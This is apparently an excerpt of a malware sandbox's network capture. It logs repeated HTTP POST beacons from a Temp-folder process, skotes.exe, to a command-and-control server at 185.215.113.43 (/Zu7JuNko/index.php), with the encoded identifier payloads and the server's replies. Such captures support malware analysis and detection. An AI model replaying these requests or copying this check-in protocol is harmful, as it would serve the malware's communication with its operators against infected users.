38	192.168.2.5	50114	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:30.111016989 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:14:31.492491961 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 21, 2024 22:17:00.820262909 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:17:02.177285910 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50117	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:33.233762980 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:14:34.622838974 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 21, 2024 22:17:09.944502115 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:17:11.527740002 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50119	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:36.251724005 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:14:37.587023973 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 21, 2024 22:17:16.241905928 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:17:17.639616966 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50121	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:39.327333927 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:14:40.716308117 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 21, 2024 22:17:22.399816036 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:17:23.796700954 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	50124	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:42.346173048 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:14:43.727556944 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 21, 2024 22:17:31.731450081 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:17:33.115369081 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50126	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:45.468086958 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:14:46.844578028 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 21, 2024 22:17:37.819191933 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:17:39.242203951 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:17:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50135	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:48.494431019 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:14:49.838747025 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50153	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:51.583614111 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:14:52.963824034 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 21, 2024 22:18:48.194555044 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:18:49.587250948 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:18:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50165	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:54.603485107 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:14:55.938561916 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 21, 2024 22:19:21.962166071 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:19:23.306157112 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50178	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:14:57.694581985 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:14:59.083745003 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:14:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 21, 2024 22:19:55.803772926 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:19:57.232568979 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:19:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	50181	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:00.709355116 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:15:02.101237059 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 21, 2024 22:20:01.946501017 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:20:03.384702921 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:20:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	50186	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:03.849797964 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:15:05.236306906 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 21, 2024 22:20:17.499715090 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:20:18.943212986 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:20:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	50188	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:06.866672039 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 21, 2024 22:15:08.249428988 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	50196	185.215.113.43	80	4500	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 22:15:09.975229979 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 21, 2024 22:15:11.398477077 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 21 Nov 2024 21:15:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

